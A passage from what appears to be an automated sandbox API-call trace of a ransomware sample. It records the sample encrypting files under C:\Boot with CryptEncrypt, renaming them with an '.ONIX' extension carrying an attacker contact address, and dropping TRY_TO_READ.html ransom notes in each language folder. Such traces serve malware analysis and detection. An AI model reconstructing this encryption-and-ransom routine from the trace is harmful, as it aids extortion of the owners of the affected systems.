[0065.015] lstrcpyW (in: lpString1=0x43e3f8, lpString2="C:\\\\Boot\\BCD.LOG2" | out: lpString1="C:\\\\Boot\\BCD.LOG2") returned="C:\\\\Boot\\BCD.LOG2" [0065.015] lstrcatW (in: lpString1="C:\\\\Boot\\BCD.LOG2", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Boot\\BCD.LOG2.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Boot\\BCD.LOG2.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0065.016] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=0) returned 1 [0065.016] SetFilePointer (in: hFile=0x3dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x0 [0065.016] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0065.016] GetProcessHeap () returned 0x410000 [0065.016] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x47f488 [0065.016] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47f488*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x47f488*, pdwDataLen=0x367f414*=0x100) returned 1 [0065.016] WriteFile (in: hFile=0x3dc, lpBuffer=0x47f488*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x47f488*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0065.019] WriteFile (in: hFile=0x3dc, lpBuffer=0x4665a8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4665a8*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0065.020] WriteFile (in: hFile=0x3dc, lpBuffer=0x4665a8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4665a8*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0065.021] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1) returned 0x4665c8 [0065.021] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1) returned 0x4665b8 [0065.021] SetFilePointer (in: hFile=0x3dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.021] ReadFile (in: hFile=0x3dc, lpBuffer=0x4665c8, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4665c8*, lpNumberOfBytesRead=0x367f44c*=0x0, lpOverlapped=0x0) returned 1 [0065.021] SetFilePointer (in: hFile=0x3dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.021] WriteFile (in: hFile=0x3dc, lpBuffer=0x4665b8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4665b8*, lpNumberOfBytesWritten=0x367f44c*=0x0, lpOverlapped=0x0) returned 1 [0065.021] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665c8 | out: hHeap=0x410000) returned 1 [0065.022] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665b8 | out: hHeap=0x410000) returned 1 [0065.022] UnlockFile (hFile=0x3dc, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x0, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0065.022] CloseHandle (hObject=0x3dc) returned 1 [0065.023] GetProcessHeap () returned 0x410000 [0065.023] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47f488 | out: hHeap=0x410000) returned 1 [0065.023] MoveFileExW (lpExistingFileName="C:\\\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), lpNewFileName="C:\\\\Boot\\BCD.LOG2.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\boot\\bcd.log2.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0065.025] GetProcessHeap () returned 0x410000 [0065.025] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0065.025] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47f380 | out: hHeap=0x410000) returned 1 [0065.025] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665a8 | out: hHeap=0x410000) returned 1 [0065.025] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470b48 | out: hHeap=0x410000) returned 1 [0065.025] FindNextFileW (in: hFindFile=0x447ba8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0065.025] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.025] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.025] GetLastError () returned 0x0 [0065.025] SetLastError (dwErrCode=0x0) [0065.025] GetLastError () returned 0x0 [0065.025] SetLastError (dwErrCode=0x0) [0065.025] GetLastError () returned 0x0 [0065.025] SetLastError (dwErrCode=0x0) [0065.025] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x472000 [0065.025] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470b48 [0065.025] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0065.025] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0065.025] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470b48 | out: hHeap=0x410000) returned 1 [0065.025] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x472000 | out: hHeap=0x410000) returned 1 [0065.025] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470b48 [0065.025] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100) returned 0x47f380 [0065.025] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665a8 [0065.025] CreateFileW (lpFileName="C:\\\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x3dc [0065.026] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.026] LockFile (hFile=0x3dc, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10000, nNumberOfBytesToLockHigh=0x0) returned 1 [0065.026] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0065.026] ReadFile (in: hFile=0x3dc, lpBuffer=0x530000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x530000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0065.028] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0065.028] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.028] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x47f380 | out: pbBuffer=0x47f380) returned 1 [0065.028] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4665a8 | out: pbBuffer=0x4665a8) returned 1 [0065.028] SetFileAttributesW (lpFileName="C:\\\\Boot\\BOOTSTAT.DAT", dwFileAttributes=0x80) returned 1 [0065.028] lstrlenW (lpString="C:\\\\Boot\\BOOTSTAT.DAT") returned 21 [0065.028] GetProcessHeap () returned 0x410000 [0065.028] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x9a) returned 0x43e3f8 [0065.028] lstrcpyW (in: lpString1=0x43e3f8, lpString2="C:\\\\Boot\\BOOTSTAT.DAT" | out: lpString1="C:\\\\Boot\\BOOTSTAT.DAT") returned="C:\\\\Boot\\BOOTSTAT.DAT" [0065.028] lstrcatW (in: lpString1="C:\\\\Boot\\BOOTSTAT.DAT", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Boot\\BOOTSTAT.DAT.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Boot\\BOOTSTAT.DAT.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0065.029] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=65536) returned 1 [0065.029] SetFilePointer (in: hFile=0x3dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x10000 [0065.029] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0065.029] GetProcessHeap () returned 0x410000 [0065.029] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x47f488 [0065.029] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47f488*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x47f488*, pdwDataLen=0x367f414*=0x100) returned 1 [0065.029] WriteFile (in: hFile=0x3dc, lpBuffer=0x47f488*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x47f488*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0065.031] WriteFile (in: hFile=0x3dc, lpBuffer=0x4665a8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4665a8*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0065.032] WriteFile (in: hFile=0x3dc, lpBuffer=0x4665a8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4665a8*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0065.033] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10000) returned 0x47f590 [0065.033] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10000) returned 0x48f598 [0065.034] SetFilePointer (in: hFile=0x3dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.034] ReadFile (in: hFile=0x3dc, lpBuffer=0x47f590, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x47f590*, lpNumberOfBytesRead=0x367f44c*=0x10000, lpOverlapped=0x0) returned 1 [0065.036] SetFilePointer (in: hFile=0x3dc, lDistanceToMove=-65536, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.036] WriteFile (in: hFile=0x3dc, lpBuffer=0x48f598*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x48f598*, lpNumberOfBytesWritten=0x367f44c*=0x10000, lpOverlapped=0x0) returned 1 [0065.227] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47f590 | out: hHeap=0x410000) returned 1 [0065.228] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48f598 | out: hHeap=0x410000) returned 1 [0065.229] UnlockFile (hFile=0x3dc, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10000, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0065.229] CloseHandle (hObject=0x3dc) returned 1 [0065.231] GetProcessHeap () returned 0x410000 [0065.231] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47f488 | out: hHeap=0x410000) returned 1 [0065.231] MoveFileExW (lpExistingFileName="C:\\\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), lpNewFileName="C:\\\\Boot\\BOOTSTAT.DAT.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\boot\\bootstat.dat.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0065.233] GetProcessHeap () returned 0x410000 [0065.233] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0065.233] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47f380 | out: hHeap=0x410000) returned 1 [0065.233] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665a8 | out: hHeap=0x410000) returned 1 [0065.233] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470b48 | out: hHeap=0x410000) returned 1 [0065.233] FindNextFileW (in: hFindFile=0x447ba8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0065.233] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.234] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.234] GetLastError () returned 0x0 [0065.234] SetLastError (dwErrCode=0x0) [0065.234] GetLastError () returned 0x0 [0065.234] SetLastError (dwErrCode=0x0) [0065.234] GetLastError () returned 0x0 [0065.234] SetLastError (dwErrCode=0x0) [0065.234] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x472000 [0065.234] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x471fb0 [0065.234] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cb08 [0065.234] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665a8 [0065.234] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665b8 [0065.234] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0065.234] GetLastError () returned 0x0 [0065.234] SetLastError (dwErrCode=0x0) [0065.234] GetLastError () returned 0x0 [0065.234] SetLastError (dwErrCode=0x0) [0065.234] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541f0 [0065.234] CreateFileW (lpFileName="C:\\\\Boot\\cs-CZ\\TRY_TO_READ.html" (normalized: "c:\\boot\\cs-cz\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3dc [0065.235] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541f0 | out: hHeap=0x410000) returned 1 [0065.235] WriteFile (in: hFile=0x3dc, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0065.235] WriteFile (in: hFile=0x3dc, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0065.236] WriteFile (in: hFile=0x3dc, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0065.236] CloseHandle (hObject=0x3dc) returned 1 [0065.236] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0065.236] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665b8 | out: hHeap=0x410000) returned 1 [0065.236] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665a8 | out: hHeap=0x410000) returned 1 [0065.236] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cb08 | out: hHeap=0x410000) returned 1 [0065.236] FindNextFileW (in: hFindFile=0x447ba8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0065.236] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.236] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.236] GetLastError () returned 0x0 [0065.236] SetLastError (dwErrCode=0x0) [0065.236] GetLastError () returned 0x0 [0065.236] SetLastError (dwErrCode=0x0) [0065.236] GetLastError () returned 0x0 [0065.236] SetLastError (dwErrCode=0x0) [0065.236] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cb08 [0065.236] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cb30 [0065.236] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cb58 [0065.236] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665a8 [0065.236] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665b8 [0065.236] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0065.236] GetLastError () returned 0x0 [0065.236] SetLastError (dwErrCode=0x0) [0065.236] GetLastError () returned 0x0 [0065.236] SetLastError (dwErrCode=0x0) [0065.236] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541f0 [0065.237] CreateFileW (lpFileName="C:\\\\Boot\\da-DK\\TRY_TO_READ.html" (normalized: "c:\\boot\\da-dk\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3dc [0065.237] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541f0 | out: hHeap=0x410000) returned 1 [0065.237] WriteFile (in: hFile=0x3dc, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0065.238] WriteFile (in: hFile=0x3dc, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0065.238] WriteFile (in: hFile=0x3dc, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0065.238] CloseHandle (hObject=0x3dc) returned 1 [0065.238] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0065.238] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665b8 | out: hHeap=0x410000) returned 1 [0065.238] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665a8 | out: hHeap=0x410000) returned 1 [0065.238] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cb58 | out: hHeap=0x410000) returned 1 [0065.238] FindNextFileW (in: hFindFile=0x447ba8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0065.238] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.238] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.238] GetLastError () returned 0x0 [0065.238] SetLastError (dwErrCode=0x0) [0065.238] GetLastError () returned 0x0 [0065.238] SetLastError (dwErrCode=0x0) [0065.238] GetLastError () returned 0x0 [0065.238] SetLastError (dwErrCode=0x0) [0065.238] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cb58 [0065.239] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cb80 [0065.239] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cba8 [0065.239] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665a8 [0065.239] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665b8 [0065.239] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0065.239] GetLastError () returned 0x0 [0065.239] SetLastError (dwErrCode=0x0) [0065.239] GetLastError () returned 0x0 [0065.239] SetLastError (dwErrCode=0x0) [0065.239] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541f0 [0065.239] CreateFileW (lpFileName="C:\\\\Boot\\de-DE\\TRY_TO_READ.html" (normalized: "c:\\boot\\de-de\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3dc [0065.240] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541f0 | out: hHeap=0x410000) returned 1 [0065.240] WriteFile (in: hFile=0x3dc, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0065.241] WriteFile (in: hFile=0x3dc, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0065.241] WriteFile (in: hFile=0x3dc, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0065.241] CloseHandle (hObject=0x3dc) returned 1 [0065.241] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0065.241] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665b8 | out: hHeap=0x410000) returned 1 [0065.241] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665a8 | out: hHeap=0x410000) returned 1 [0065.241] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cba8 | out: hHeap=0x410000) returned 1 [0065.241] FindNextFileW (in: hFindFile=0x447ba8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0065.241] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.241] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.241] GetLastError () returned 0x0 [0065.241] SetLastError (dwErrCode=0x0) [0065.241] GetLastError () returned 0x0 [0065.242] SetLastError (dwErrCode=0x0) [0065.242] GetLastError () returned 0x0 [0065.242] SetLastError (dwErrCode=0x0) [0065.242] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cba8 [0065.242] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cbd0 [0065.242] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cbf8 [0065.242] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665a8 [0065.242] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665b8 [0065.242] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0065.242] GetLastError () returned 0x0 [0065.242] SetLastError (dwErrCode=0x0) [0065.242] GetLastError () returned 0x0 [0065.242] SetLastError (dwErrCode=0x0) [0065.242] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541f0 [0065.242] CreateFileW (lpFileName="C:\\\\Boot\\el-GR\\TRY_TO_READ.html" (normalized: "c:\\boot\\el-gr\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3dc [0065.242] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541f0 | out: hHeap=0x410000) returned 1 [0065.242] WriteFile (in: hFile=0x3dc, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0065.243] WriteFile (in: hFile=0x3dc, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0065.243] WriteFile (in: hFile=0x3dc, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: 